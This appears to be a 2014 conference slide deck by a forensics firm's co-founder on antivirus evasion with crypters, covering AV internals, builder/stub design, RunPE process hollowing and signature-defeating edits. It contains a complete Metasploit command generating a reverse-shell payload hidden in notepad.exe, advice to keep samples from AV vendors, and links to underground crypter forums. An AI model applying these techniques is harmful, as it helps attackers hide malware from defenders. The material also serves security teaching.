AntiVirus Evasion: Use of Crypters

Abraham Pasamar - INCIDE - #mundohackerday - 29.04.14

Whoamincd:~ apasamar$ whoami apasamar apasamar@incide.es @apasamar a.k.a brajan ncd:~ apasamar$ cat apasamar.cv Electrical Engineer and Master in Information Security Co-founder of INCIDE: Electronic Evidence Experts Forensics / Expert Witness Reports Incident Response IT Security Auditors and Colsultants !ncd:~ apasamar$ rm apasamar.cv

what is this about...• Introduction

• AV’s how they work

• Malware types and AV detection

• Evasion techniques

• Auto-encryption, Polymorfism, Ofuscation, Compresion

• Crypters

• types

• stub

• stub FUD

• Modding techniques

• Resources

introduction

• MALWARE = $$$$$$$$$

• BOTNETS, APT, RANSOMWARE

• Empresas AV’s —> Detectar MALWARE

• Malos: INDETECTAR MALWARE

introduction

• MALWARE = $$$$$$$$$

• BOTNETS, APT, RANSOMWARE

• AV Companies —> MALWARE Detection

• BAD GUYS: Undetect MALWARE

introductionBad guys objective:

introductionBad guys objective:

AV howto• AntiVirus scan binaries on HARD DISC

• They do not SCAN MEMORY, only binaries that ‘start’ the running processes

• Scan for signatures: binary sequences @ AV DataBase

• Look for malicious tecniques (Heuristics): API’s, functions, XOR, etc

• Sandbox (partial execution):look for decryption routines, etc

AV howto

EJECUTABLE

DISCO

RAM

PRO

CES

O?

SCAN?

AV

AV howto• AV analysis process:

Atacs

AV howto

• Recomended:

“Abusing File Processing in Malware

Detectors for Fun and Profit” (2012)

Suman Jana and Vitaly Shmatikov

The University of Texas at Austin

AV howto• Metasploit Framework (Rapid7)

• Community Edition:

• msfpayload windows/shell/reverse_tcp LHOST=192.168.1.75 LPORT=4444 R | msfencode -c 5 -e x86/shikata_ga_nai -x notepad.exe > notepad2.exe

• Pro Edition:

• Generate AV-evading Dynamic Payloads

types of malware and AV detection

• Comercial SPY Programms: (white list, signed)

• e-blaster

• 007

• perfect keylogger

• …

• Malware newly created:

• LOW detection (NO known signatures)

• possible heuristic detections

types of malware and AV detection

• Existing Malware: (very well known, signature and heuristic detections)

• trojans (BiFrost, PoisonIvy,CyberGate, SpyNet, Darkcomet)

• downloaders

• passwords stealers

• reverse shells

types of malware and AV detection

How can we make undetectable malware already detected by AV?

• C r y p t e r s:

• Software allows you to encrypt ANY MALWARE doing it undetectable to AV.

crypters

builder / stub

• Builder:

• Is responsible for creating the NEW EXEcutable, composed of the STUB and the ENCRYPTED MALWARE

• Stub:

• Its mission is to decrypt and run the ENCRYPTED MALWARE

!!!!!!!!!

CRYPTER + STUB

STUB

DETECTED MALWARE

ENCRYPTED MALWARE

STUB

CRYPTER (Builder)

XOR, RC4, ...

exe dll

resource

builder / stub

STUB CRYPTED MALWARE

STUB CRYPTED MALWAREKEY

split

ter

split

ter

A resource section can always be used

builder / stub

• Crypters types:

• ScanTime

• RunTime

builder / stub

• ScanTime

STUB CRYPTED MALWARE DETECTED MALWARE

HARD DISC

AV

stub

• RunTime

STUB ENCRYPTED MALWARE

HARD DISC

RAM

DET

ECTE

D M

ALW

ARE

AV

stub

• STUB modules:

• Decrypt Routine

• RunPe (Dynamic Forking) Routine

!

stub

RunPE o Dynamic ForkingCreateProcess

PRO

CES

s 1

(CREATE_SUSPENDED)

GetThreadContext

PEB EBX

EAX

BaseAddress 1

EP I

+8

PRO

CES

S 2

ReadFile WriteProcessMemoryEP 2

BaseAddress 2

SetThreadContextResumeThread

FUD

• Target: FUD Stub (Full UnDetectable)

• From Source Code

• From Binary Code

• ¿How?

• MODDING

modding source code• Manually or using obfuscation tools:

• Function replacement (SPLIT,..)

• Funciones/strings/variables replacement and ofuscation. Use of rot13 or Hex encoding

• Encrytion: RC4 and XOR are very well known by AV

• Alternatives: TEA, DES, etc

• Alternative RunPE Routines

• Fake APIs

• TLB (Tab Library File)

• Trash code

• Techniques:

• Dsplit/AvFucker

• SignatureFucker

• Hexing

• RIT

• XOR and variants

• Tips

modding binary file

• We have to Undetect STUB, BUILDER is only a tool used at home, not in the wild

• First of all is to FIND AV SIGNATURES:

• Simple Signatures

• Multiple Signatures

• Heuristic Signatures

modding binary file

• Recomended:

“Bypassing Anti-Virus Scanners” (2012)

InterNOT Security Team

modding binary file

• ¿What if we use a simple Encrytion/Decrytion rutine inside the STUB?

stub.exe

EP

Signatures stub.exe

OLD EP

Signatures

NEW EP

Encrypted

Decrytion Rutine

modding binary file

• ORIGINAL STUB MULTIPLE AV SCAN

modding binary file

Do NOT use VirusTotal

for these Scans or your STUB samples

will be send to AV Companies :(

• ENCRYPTION ROUTINE

• NEW EP

• INSERT ROUTINE

• .text SECTION

• from offset 1050

• to Import Table

modding binary file

• ENCRYPTION ROUTINE AT NEW EP

• used only to encrypt .text section (used once)

Set breakpoint here, after encryption routine

modding binary file

• DECRYPTION AND EXECUTION AN NEW EP

modding binary file

• MODIFIED STUB MULTIPLE AV SCAN

16 AV’s KO

modding binary file

modding binary file• Techniques:

• Dsplit/AvFucker

• SignatureFucker

• Hexing

• RIT

• XOR and variants

• Tips

• DSplit:

Header EXE body

Header EXE body

1000 bytes

Header EXE body

2000 bytes

Header EXE body

3000 bytes

Header EXE body

··· Nx1000 bytes

modding binary file

• AvFucker:

EXE bodyHeader 0000000000

1000 bytes

Header EXE body0000000000

1000 bytes

Header Cuerpo EXE0000000000

1000 bytes

Header EXE body

···0000000000

1000 bytes

modding binary file

Header EXE body

• RIT Technique

• Find out AV Signature

• If Signture is located at instructions code —> break flow

• jump to another address (hole in section where yo can write your code)

• Execute pending instrucionts

• Return/jump to the appropriate instrucion

!

modding binary file

• XOR Tecnique

• Find out AV Signature

• Apply to a byte XOR with any value i.e. 22

• Modify EP or jump to your hole

• Apply XOR 22 to the modified byte

• Return/jump to the appropriate instrucion

modding binary file

Detected bytes (EP):

XOR of the detected bytes:

New EP ( XORs and jump to original EP):

modding binary file

other techniques

• Add Fake APIs

• Hex strings edit

• Move/change function calls

• Change funtion call type: by name/by offset

• Insert detected dll function into Stub Code

!

resources

• http://www.indetectables.net

• http://www.udtools.net

• http://www.masters-hackers.info

• http://www.level-23.biz/

• http://www.corp-51.net/

• http://www.underc0de.org

!

Avda. Diagonal, 640 6ª Planta

08017 Barcelona (Spain)

info@incide.es

http://www.incide.es

http://www.twitter.com/1NC1D3

http://www.atrapadosporlosbits.com

http://www.youtube.com/incidetube

Companies > INCIDE - Investigación Digital

Tel./Fax. +34 932 546 277 / +34 932 546 314

A N Y Q U E S T I O N S ?